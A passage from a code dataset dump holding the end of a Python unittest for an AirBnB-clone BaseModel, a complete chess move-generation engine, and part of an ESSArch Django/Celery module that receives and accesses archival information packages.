       self.assertFalse(self.a.id == self.b.id)\n\n    def test_instance(self):\n        \"\"\"test instance variables\"\"\"\n        # print(\"\\nIn instance\")\n        \"\"\"check that each variable is an instance of the expected type\"\"\"\n        self.assertIsInstance(self.a.id, str)\n        self.assertIsInstance(self.a.created_at, datetime.datetime)\n        self.assertIsInstance(self.a.updated_at, datetime.datetime)\n\n    def test_time(self):\n        \"\"\"test time\"\"\"\n        # print(\"\\nIn time\")\n        \"\"\"check ISO8601 format\"\"\"\n        pattern = r'\\d{4}-\\d{2}-\\d{2}[T]\\d{2}:\\d{2}.\\d{2}.\\d{6}'\n        self.assertRegex(self.a.created_at.isoformat(), pattern)\n        self.assertRegex(self.a.updated_at.isoformat(), pattern)\n        \"\"\"False: created >= update\"\"\"\n        self.assertTrue(self.a.created_at <= self.a.updated_at)\n        temp = self.a.updated_at\n        self.a.save()\n        self.assertNotEqual(self.a.updated_at, temp)\n\n    def test_dict(self):\n        \"\"\"test to_dict\"\"\"\n        # print('\\nin dict')\n        self.assertIsInstance(self.a, BaseModel)\n        self.assertIsInstance(self.a.to_dict(), dict)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"Raid55/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11789596336","text":"import numpy as np\r\n\r\n\r\nclass Game:\r\n    
def __init__(self):\r\n self.board = np.array([\r\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\r\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\r\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\r\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]])\r\n self.getPieceMoves = {\"p\": self.getPawnMoves, \"R\": self.getRookMoves, \"N\": self.getKnightMoves,\r\n \"B\": self.getBishopMoves, \"Q\": self.getQueenMoves, \"K\": self.getKingMoves}\r\n self.whiteToMove = True\r\n self.wKLocation = (7, 4)\r\n self.bKLocation = (0, 4)\r\n self.whiteKingsideCastle = True\r\n self.whiteQueensideCastle = True\r\n self.blackKingsideCastle = True\r\n self.blackQueensideCastle = True\r\n self.enPassantPossible = False\r\n self.doubleEnPassant = False\r\n self.pawnMoved = ()\r\n self.enPassantPawns = ()\r\n self.inCheck = False\r\n self.checkmate = False\r\n self.stalemate = False\r\n self.draw = False\r\n self.pins = []\r\n self.checks = []\r\n self.sincePawnMoved = 0\r\n self.sinceCapture = 0\r\n self.moveLog = []\r\n\r\n def getPawnMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n if self.whiteToMove:\r\n moveDirection = -1\r\n startRow = 6\r\n backRow = 0\r\n enemy = \"b\"\r\n else:\r\n moveDirection = 1\r\n startRow = 1\r\n backRow = 7\r\n enemy = \"w\"\r\n\r\n if self.enPassantPossible:\r\n for p in self.enPassantPawns:\r\n if p[0] == row and p[1] == col:\r\n self.enPassant(row, col, moves)\r\n\r\n if self.board[row + moveDirection][col] == \"--\":\r\n if not piecePinned or pinDirection == (moveDirection, 0):\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col), self.board))\r\n if row == startRow and self.board[row + 2 * moveDirection][col] == \"--\":\r\n if 0 <= col - 1 < 8 and 0 <= col + 1 < 8:\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy or self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy and self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n self.doubleEnPassant = True\r\n else:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board))\r\n elif col == 0:\r\n if self.board[row + 2 * moveDirection][col + 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n self.pawnMoved = (row + 2 * moveDirection, col)\r\n else:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board))\r\n elif col == 7:\r\n if self.board[row + 2 * moveDirection][col - 1][0] == enemy:\r\n moves.append(Move((row, col), (row + 2 * moveDirection, col), self.board, doublePawnMove=True))\r\n self.pawnMoved = (row + 2 * moveDirection, col)\r\n else:\r\n moves.append(Move((row, 
col), (row + 2 * moveDirection, col), self.board))\r\n if col - 1 >= 0:\r\n if not piecePinned or pinDirection == (moveDirection, -1):\r\n if self.board[row + moveDirection][col - 1][0] == enemy:\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col - 1), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col - 1), self.board))\r\n if col + 1 <= 7:\r\n if not piecePinned or pinDirection == (moveDirection, 1):\r\n if self.board[row + moveDirection][col + 1][0] == enemy:\r\n if row + moveDirection == backRow:\r\n moves.append(Move((row, col), (row + moveDirection, col + 1), self.board, pawnPromotion=True))\r\n else:\r\n moves.append(Move((row, col), (row + moveDirection, col + 1), self.board))\r\n\r\n def enPassant(self, row, col, moves):\r\n if self.whiteToMove:\r\n moves.append(Move((row, col), (self.pawnMoved[0]-1, self.pawnMoved[1]), self.board, enPassant=True))\r\n else:\r\n moves.append(Move((row, col), (self.pawnMoved[0]+1, self.pawnMoved[1]), self.board, enPassant=True))\r\n if self.doubleEnPassant:\r\n self.enPassantPossible = True\r\n self.doubleEnPassant = False\r\n else:\r\n self.enPassantPossible = False\r\n\r\n def getKnightMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for k in knightMoves:\r\n newRow = row + k[0]\r\n newCol = col + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n\r\n def getBishopMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n self.pins.remove(self.pins[i])\r\n break\r\n bishopMoves = ((-1, -1), (-1, 1), (1, -1), (1, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for b in bishopMoves:\r\n for i in range(1, 8):\r\n newRow = row + b[0] * i\r\n newCol = col + b[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned or pinDirection == b or pinDirection == (-b[0], -b[1]):\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece == \"--\":\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n elif newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n\r\n def getRookMoves(self, row, col, moves):\r\n piecePinned = False\r\n pinDirection = ()\r\n for i in range(len(self.pins) - 1, -1, -1):\r\n if self.pins[i][0] == row and self.pins[i][1] == col:\r\n piecePinned = True\r\n pinDirection = (self.pins[i][2], self.pins[i][3])\r\n if self.board[row][col][1] != \"Q\":\r\n self.pins.remove(self.pins[i])\r\n break\r\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for r in rookMoves:\r\n for i in range(1, 8):\r\n newRow = row + r[0] * i\r\n newCol = col + r[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n if not piecePinned or 
pinDirection == r or pinDirection == (-r[0], -r[1]):\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece == \"--\":\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n elif newPiece[0] != ally:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n\r\n def getQueenMoves(self, row, col, moves):\r\n self.getRookMoves(row, col, moves)\r\n self.getBishopMoves(row, col, moves)\r\n\r\n def getKingMoves(self, row, col, moves):\r\n kingMoves = ((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))\r\n ally = \"w\" if self.whiteToMove else \"b\"\r\n for k in kingMoves:\r\n newRow = row + k[0]\r\n newCol = col + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] != ally:\r\n # Kings sent to their potential end locations to see if these positions would be valid\r\n if ally == \"w\":\r\n self.wKLocation = (newRow, newCol)\r\n else:\r\n self.bKLocation = (newRow, newCol)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n moves.append(Move((row, col), (newRow, newCol), self.board))\r\n # If the move has not been appended to val3dMoves, the King locations are reset\r\n # Otherwise they remain the same\r\n if ally == \"w\":\r\n self.wKLocation = (row, col)\r\n else:\r\n self.bKLocation = (row, col)\r\n\r\n if not self.inCheck:\r\n self.kingsideCastle(row, col, moves)\r\n self.queensideCastle(row, col, moves)\r\n\r\n def kingsideCastle(self, row, col, moves):\r\n oldKingLocation = self.wKLocation if self.whiteToMove else self.bKLocation\r\n if self.whiteToMove:\r\n if self.whiteKingsideCastle:\r\n if self.board[7][5] == \"--\" and self.board[7][6] == \"--\":\r\n self.wKLocation = (7, 5)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 6)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 7)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = oldKingLocation\r\n moves.append(Move((row, col), (7, 6), self.board, castle=True))\r\n else:\r\n if self.blackKingsideCastle:\r\n if self.board[0][5] == \"--\" and self.board[0][6] == \"--\":\r\n self.bKLocation = (0, 5)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 6)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 7)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = oldKingLocation\r\n moves.append(Move((row, col), (0, 6), self.board, castle=True))\r\n\r\n def queensideCastle(self, row, col, moves):\r\n oldKingLocation = self.wKLocation if self.whiteToMove else self.bKLocation\r\n if self.whiteToMove:\r\n if self.whiteQueensideCastle:\r\n if self.board[7][1] == \"--\" and self.board[7][2] == \"--\" and self.board[7][3] == \"--\":\r\n self.wKLocation = (7, 0)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 1)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 2)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = (7, 3)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.wKLocation = oldKingLocation\r\n moves.append(Move((row, col), (7, 2), self.board, castle=True))\r\n else:\r\n if self.blackQueensideCastle:\r\n if self.board[0][1] == \"--\" and self.board[0][2] == \"--\" 
and self.board[0][3] == \"--\":\r\n self.bKLocation = (0, 0)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 1)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 2)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = (0, 3)\r\n inCheck, pins, checks = self.pinsAndChecks()\r\n if not inCheck:\r\n self.bKLocation = oldKingLocation\r\n moves.append(Move((row, col), (0, 2), self.board, castle=True))\r\n\r\n def inCheck(self):\r\n if self.whiteToMove:\r\n return self.underAttack(self.wKLocation[0], self.wKLocation[1])\r\n else:\r\n return self.underAttack(self.bKLocation[0], self.bKLocation[1])\r\n\r\n def underAttack(self, row, col):\r\n self.whiteToMove = not self.whiteToMove\r\n allEnemyMoves = self.allMoves()\r\n self.whiteToMove = not self.whiteToMove\r\n for move in allEnemyMoves:\r\n if move.newRow == row and move.newCol == col:\r\n return True\r\n return False\r\n\r\n def allMoves(self):\r\n moves = []\r\n for row in range(len(self.board)):\r\n for col in range(len(self.board[row])):\r\n turn = self.board[row][col][0]\r\n if (turn == \"w\" and self.whiteToMove) or (turn == \"b\" and not self.whiteToMove):\r\n piece = self.board[row][col][1]\r\n self.getPieceMoves[piece](row, col, moves)\r\n return moves\r\n\r\n def validMoves(self):\r\n moves = []\r\n self.inCheck, self.pins, self.checks = self.pinsAndChecks()\r\n if self.whiteToMove:\r\n kingRow = self.wKLocation[0]\r\n kingCol = self.wKLocation[1]\r\n else:\r\n kingRow = self.bKLocation[0]\r\n kingCol = self.bKLocation[1]\r\n if self.inCheck:\r\n if len(self.checks) == 1:\r\n moves = self.allMoves()\r\n check = self.checks[0]\r\n checkRow = check[0]\r\n checkCol = check[1]\r\n pieceChecking = self.board[checkRow][checkCol]\r\n validSquares = []\r\n if pieceChecking[1] == \"N\":\r\n validSquares = [(checkRow, checkCol)]\r\n else:\r\n for i in range(1, 8):\r\n validSquare = (kingRow + check[2] * i, kingCol + check[3] * i)\r\n validSquares.append(validSquare)\r\n if validSquare[0] == checkRow and validSquare[1] == checkCol:\r\n break\r\n for i in range(len(moves) - 1, -1, -1):\r\n if moves[i].pieceMoved[1] != \"K\":\r\n if not (moves[i].newRow, moves[i].newCol) in validSquares:\r\n moves.remove(moves[i])\r\n else:\r\n self.getKingMoves(kingRow, kingCol, moves)\r\n else:\r\n moves = self.allMoves()\r\n\r\n if len(moves) == 0:\r\n if self.inCheck:\r\n self.checkmate = True\r\n else:\r\n self.stalemate = True\r\n else:\r\n self.checkmate = False\r\n self.stalemate = False\r\n\r\n return moves\r\n\r\n def pinsAndChecks(self):\r\n pins = []\r\n checks = []\r\n inCheck = False\r\n if self.whiteToMove:\r\n enemy = \"b\"\r\n ally = \"w\"\r\n startRow = self.wKLocation[0]\r\n startCol = self.wKLocation[1]\r\n else:\r\n enemy = \"w\"\r\n ally = \"b\"\r\n startRow = self.bKLocation[0]\r\n startCol = self.bKLocation[1]\r\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\r\n for j in range(len(directions)):\r\n d = directions[j]\r\n possiblePin = ()\r\n for i in range(1, 8):\r\n newRow = startRow + d[0] * i\r\n newCol = startCol + d[1] * i\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] == ally and newPiece[1] != \"K\":\r\n if possiblePin == ():\r\n possiblePin = (newRow, newCol, d[0], d[1])\r\n else:\r\n break\r\n elif newPiece[0] == enemy:\r\n type = newPiece[1]\r\n if (0 <= j <= 3 and type == \"R\") or \\\r\n (4 <= j <= 7 and 
type == \"B\") or \\\r\n (i == 1 and type == \"p\" and ((enemy == \"w\" and 6 <= j <= 7) or (\r\n enemy == \"b\" and 4 <= j <= 5))) or \\\r\n (type == \"Q\") or (i == 1 and type == \"K\"):\r\n if possiblePin == ():\r\n inCheck = True\r\n checks.append((newRow, newCol, d[0], d[1]))\r\n break\r\n else:\r\n pins.append(possiblePin)\r\n break\r\n else:\r\n break\r\n else:\r\n break\r\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\r\n for k in knightMoves:\r\n newRow = startRow + k[0]\r\n newCol = startCol + k[1]\r\n if 0 <= newRow < 8 and 0 <= newCol < 8:\r\n newPiece = self.board[newRow][newCol]\r\n if newPiece[0] == enemy and newPiece[1] == \"N\":\r\n inCheck = True\r\n checks.append((newRow, newCol, k[0], k[1]))\r\n return inCheck, pins, checks\r\n\r\n def makeMove(self, move):\r\n self.board[move.newRow][move.newCol] = move.pieceMoved\r\n self.board[move.startRow][move.startCol] = \"--\"\r\n self.moveLog.append(move)\r\n self.whiteToMove = not self.whiteToMove\r\n if move.pieceMoved == \"wK\":\r\n self.wKLocation = (move.newRow, move.newCol)\r\n self.whiteKingsideCastle = False\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"bK\":\r\n self.bKLocation = (move.newRow, move.newCol)\r\n self.blackKingsideCastle = False\r\n self.blackQueensideCastle = False\r\n if move.pieceMoved == \"wR\" and move.startCol == 0:\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"wR\" and move.startCol == 7:\r\n self.whiteKingsideCastle = False\r\n elif move.pieceMoved == \"bR\" and move.startCol == 0:\r\n self.blackQueensideCastle = False\r\n elif move.pieceMoved == \"bR\" and move.startCol == 7:\r\n self.blackKingsideCastle = False\r\n if move.pawnPromotion:\r\n promotedPiece = \"Q\"\r\n #promotedPiece = input(\"Q, B, R or N?\")\r\n self.board[move.newRow][move.newCol] = move.pieceMoved[0] + promotedPiece\r\n if move.doublePawnMove:\r\n self.enPassantPossible = True\r\n self.pawnMoved = (move.newRow, move.newCol)\r\n self.enPassantPawns = ((move.newRow, move.newCol - 1), (move.newRow, move.newCol + 1))\r\n if move.enPassant:\r\n self.board[move.startRow][move.newCol] = \"--\"\r\n if move.castle:\r\n if not self.whiteToMove:\r\n if move.newRow == 7 and move.newCol == 6:\r\n self.board[7][7] = \"--\"\r\n self.board[7][5] = \"wR\"\r\n elif move.newRow == 7 and move.newCol == 2:\r\n self.board[7][0] = \"--\"\r\n self.board[7][3] = \"wR\"\r\n else:\r\n if move.newRow == 0 and move.newCol == 6:\r\n self.board[0][7] = \"--\"\r\n self.board[0][5] = \"bR\"\r\n elif move.newRow == 0 and move.newCol == 2:\r\n self.board[0][0] = \"--\"\r\n self.board[0][3] = \"bR\"\r\n if not move.capture:\r\n self.sinceCapture += 1\r\n else:\r\n self.sinceCapture = 0\r\n if not move.pieceMoved[1] == \"p\":\r\n self.sincePawnMoved += 1\r\n else:\r\n self.sincePawnMoved = 0\r\n\r\n def undoMove(self):\r\n if len(self.moveLog) != 0:\r\n move = self.moveLog.pop()\r\n self.board[move.startRow][move.startCol] = move.pieceMoved\r\n self.board[move.newRow][move.newCol] = move.pieceCaptured\r\n self.whiteToMove = not self.whiteToMove\r\n if move.pieceMoved == \"wK\":\r\n self.wKLocation = (move.startRow, move.startCol)\r\n self.whiteKingsideCastle = False\r\n self.whiteQueensideCastle = False\r\n elif move.pieceMoved == \"bK\":\r\n self.bKLocation = (move.startRow, move.startCol)\r\n if move.enPassant:\r\n self.board[move.newRow][move.newCol] = \"--\"\r\n self.board[move.startRow][move.newCol] = move.pieceCaptured\r\n if move.castle:\r\n if move.newCol - move.startCol 
== 2:\r\n self.board[move.newRow][move.newCol + 1] = self.board[move.newRow][move.newCol - 1]\r\n self.board[move.newRow][move.newCol - 1] = \"--\"\r\n else:\r\n self.board[move.newRow][move.newCol - 2] = self.board[move.newRow][move.newCol + 1]\r\n self.board[move.newRow][move.newCol + 1] = \"--\"\r\n self.checkmate = False\r\n self.stalemate = False\r\n\r\n\r\nclass Move():\r\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4,\r\n \"5\": 3, \"6\": 2, \"7\": 1, \"8\": 0}\r\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\r\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3,\r\n \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\r\n colsToFiles = {v: k for k, v in filesToCols.items()}\r\n\r\n def __init__(self, startSquare, newSquare, board, pawnPromotion=False, enPassant=False, doublePawnMove=False, castle=True):\r\n self.startRow = startSquare[0]\r\n self.startCol = startSquare[1]\r\n self.newRow = newSquare[0]\r\n self.newCol = newSquare[1]\r\n self.pieceMoved = board[self.startRow][self.startCol]\r\n self.pieceCaptured = board[self.newRow][self.newCol]\r\n self.capture = self.pieceCaptured != \"--\"\r\n self.pawnPromotion = pawnPromotion\r\n self.enPassant = enPassant\r\n if enPassant:\r\n self.pieceCaptured = \"bp\" if self.pieceMoved == \"wp\" else \"wp\"\r\n self.doublePawnMove = doublePawnMove\r\n self.castle = castle\r\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.newRow * 10 + self.newCol\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, Move):\r\n return self.moveID == other.moveID\r\n return False\r\n\r\n def toFileRank(self, row, col):\r\n return self.colsToFiles[col] + self.rowsToRanks[row]\r\n\r\n def getChessNotation(self):\r\n return self.toFileRank(self.startRow, self.startCol) + self.toFileRank(self.newRow, self.newCol)\r\n","repo_name":"mattphillips00/Chess-Endgames","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":25436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6876150067","text":"import datetime\nimport errno\nimport logging\nimport os\nimport pathlib\nimport shutil\nimport tarfile\nimport tempfile\nimport zipfile\n\nfrom celery import states as celery_states\nfrom celery.exceptions import Ignore\nfrom celery.result import allow_join_result\nfrom crontab import CronTab\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.utils import timezone\n\n# noinspection PyUnresolvedReferences\nfrom ESSArch_Core import tasks # noqa\nfrom ESSArch_Core.auth.models import Notification\nfrom ESSArch_Core.configuration.models import Path\nfrom ESSArch_Core.essxml.util import parse_mets\nfrom ESSArch_Core.fixity.checksum import calculate_checksum\nfrom ESSArch_Core.ip.models import (\n MESSAGE_DIGEST_ALGORITHM_CHOICES_DICT,\n InformationPackage,\n Workarea,\n)\nfrom ESSArch_Core.maintenance.models import (\n AppraisalJob,\n AppraisalRule,\n ConversionJob,\n ConversionRule,\n)\nfrom ESSArch_Core.storage.exceptions import (\n TapeDriveLockedError,\n TapeMountedAndLockedByOtherError,\n TapeMountedError,\n TapeUnmountedError,\n)\nfrom ESSArch_Core.storage.models import (\n Robot,\n RobotQueue,\n StorageObject,\n TapeDrive,\n)\nfrom ESSArch_Core.util import (\n creation_date,\n delete_path,\n find_destination,\n open_file,\n timestamp_to_datetime,\n)\nfrom ESSArch_Core.WorkflowEngine.dbtask import DBTask\nfrom ESSArch_Core.WorkflowEngine.models import ProcessTask\n\nUser = 
get_user_model()\nlogger = logging.getLogger('essarch')\n\n\nclass ReceiveSIP(DBTask):\n logger = logging.getLogger('essarch.workflow.tasks.ReceiveSIP')\n event_type = 20100\n\n @transaction.atomic\n def run(self, purpose=None, delete_sip=False):\n self.logger.debug('Receiving SIP')\n aip = InformationPackage.objects.get(pk=self.ip)\n algorithm = aip.get_checksum_algorithm()\n container = aip.object_path\n objid, container_type = os.path.splitext(os.path.basename(container))\n container_type = container_type.lower()\n xml = aip.package_mets_path\n aip.package_mets_create_date = timestamp_to_datetime(creation_date(xml)).isoformat()\n aip.package_mets_size = os.path.getsize(xml)\n aip.package_mets_digest_algorithm = MESSAGE_DIGEST_ALGORITHM_CHOICES_DICT[algorithm.upper()]\n aip.package_mets_digest = calculate_checksum(xml, algorithm=algorithm)\n aip.generation = 0\n aic = InformationPackage.objects.create(package_type=InformationPackage.AIC, responsible=aip.responsible,\n label=aip.label, start_date=aip.start_date, end_date=aip.end_date)\n old_sip_path = aip.object_path\n aip.aic = aic\n aip_dir = os.path.join(aip.policy.ingest_path.value, objid)\n aip.object_path = aip_dir\n try:\n os.makedirs(aip_dir)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n aip.save()\n\n dst_path, dst_name = find_destination('sip', aip.get_profile('aip').structure, aip.object_path)\n if dst_path is None:\n dst_path, dst_name = find_destination('content', aip.get_profile('aip').structure, aip.object_path)\n\n dst_name, = self.parse_params(dst_name)\n dst = os.path.join(dst_path, dst_name)\n\n sip_profile = aip.submission_agreement.profile_sip\n\n try:\n shutil.rmtree(dst)\n except FileNotFoundError:\n pass\n\n if aip.policy.receive_extract_sip:\n temp = Path.objects.cached('entity', 'temp', 'value')\n with tempfile.TemporaryDirectory(dir=temp) as tmpdir:\n self.logger.debug('Extracting {} to {}'.format(container, tmpdir))\n if container_type == '.tar':\n with tarfile.open(container) as tar:\n root_member_name = tar.getnames()[0]\n tar.extractall(tmpdir)\n elif container_type == '.zip':\n with zipfile.ZipFile(container) as zipf:\n root_member_name = zipf.namelist()[0]\n zipf.extractall(tmpdir)\n else:\n raise ValueError('Invalid container type: {}'.format(container))\n\n dst = os.path.join(dst, '')\n try:\n os.makedirs(dst)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n tmpsrc = tmpdir\n if len(os.listdir(tmpdir)) == 1 and os.listdir(tmpdir)[0] == root_member_name:\n new_tmpsrc = os.path.join(tmpdir, root_member_name)\n if os.path.isdir(new_tmpsrc):\n tmpsrc = new_tmpsrc\n\n self.logger.debug('Moving content of {} to {}'.format(tmpsrc, dst))\n\n for f in os.listdir(tmpsrc):\n shutil.move(os.path.join(tmpsrc, f), dst)\n\n self.logger.debug('Deleting {}'.format(tmpdir))\n\n aip.sip_path = os.path.relpath(dst, aip.object_path)\n else:\n self.logger.debug('Copying {} to {}'.format(container, dst))\n shutil.copy2(container, dst)\n aip.sip_path = os.path.relpath(os.path.join(dst, os.path.basename(container)), aip.object_path)\n\n sip_mets_dir, sip_mets_file = find_destination('mets_file', sip_profile.structure, aip.sip_path)\n if os.path.isfile(aip.sip_path):\n sip_mets_data = parse_mets(\n open_file(\n os.path.join(aip.object_path, sip_mets_dir, sip_mets_file),\n container=aip.sip_path,\n container_prefix=aip.object_identifier_value,\n )\n )\n else:\n sip_mets_data = parse_mets(open_file(os.path.join(aip.object_path, sip_mets_dir, sip_mets_file)))\n\n # prefix all SIP data\n 
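# Upper-case every key parsed from the SIP METS file and give it a 'SIP_'
# prefix so the values cannot collide with existing AIP profile keys when
# they are merged into aip_profile_rel_data below.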
sip_mets_data = {f'SIP_{k.upper()}': v for k, v in sip_mets_data.items()}\n\n aip_profile_rel_data = aip.get_profile_rel('aip').data\n aip_profile_rel_data.data.update(sip_mets_data)\n aip_profile_rel_data.save()\n\n if delete_sip:\n delete_path(old_sip_path)\n delete_path(pathlib.Path(old_sip_path).with_suffix('.xml'))\n\n self.logger.debug('sip_path set to {}'.format(aip.sip_path))\n aip.save()\n\n def event_outcome_success(self, result, purpose=None, delete_sip=False):\n return \"Received SIP\"\n\n\nclass ReceiveAIP(DBTask):\n event_type = 30710\n\n def run(self, workarea):\n workarea = Workarea.objects.prefetch_related('ip').get(pk=workarea)\n ip = workarea.ip\n\n ip.state = 'Receiving'\n ip.save(update_fields=['state'])\n\n ingest = ip.policy.ingest_path\n dst = os.path.join(ingest.value, ip.object_identifier_value)\n\n shutil.copytree(ip.object_path, dst)\n\n ip.object_path = dst\n ip.state = 'Received'\n ip.save()\n\n\nclass AccessAIP(DBTask):\n def run(self, aip, storage_object=None, tar=True, extracted=False, new=False, package_xml=False,\n aic_xml=False, object_identifier_value=\"\", dst=None):\n aip = InformationPackage.objects.get(pk=aip)\n responsible = User.objects.get(pk=self.responsible)\n\n # if it is a received IP, i.e. from ingest and not from storage,\n # then we read it directly from disk and move it to the ingest workarea\n if aip.state == 'Received':\n if not extracted and not new:\n raise ValueError('An IP must be extracted when transferred to ingest workarea')\n\n if new:\n # Create new generation of the IP\n\n old_aip = aip.pk\n new_aip = aip.create_new_generation('Ingest Workarea', responsible, object_identifier_value)\n aip = InformationPackage.objects.get(pk=old_aip)\n else:\n new_aip = aip\n\n workarea = Path.objects.get(entity='ingest_workarea').value\n workarea_user = os.path.join(workarea, responsible.username)\n dst_dir = os.path.join(workarea_user, new_aip.object_identifier_value, )\n\n shutil.copytree(aip.object_path, dst_dir)\n\n workarea_obj = Workarea.objects.create(\n ip=new_aip, user_id=self.responsible, type=Workarea.INGEST, read_only=not new\n )\n Notification.objects.create(\n message=\"%s is now in workarea\" % new_aip.object_identifier_value,\n level=logging.INFO, user_id=self.responsible, refresh=True\n )\n\n if new:\n new_aip.object_path = dst_dir\n new_aip.save(update_fields=['object_path'])\n\n return str(workarea_obj.pk)\n\n if storage_object is not None:\n storage_object = StorageObject.objects.get(pk=storage_object)\n else:\n storage_object = aip.get_fastest_readable_storage_object()\n\n aip.access(storage_object, self.get_processtask(), dst=dst)\n\n\nclass PollRobotQueue(DBTask):\n 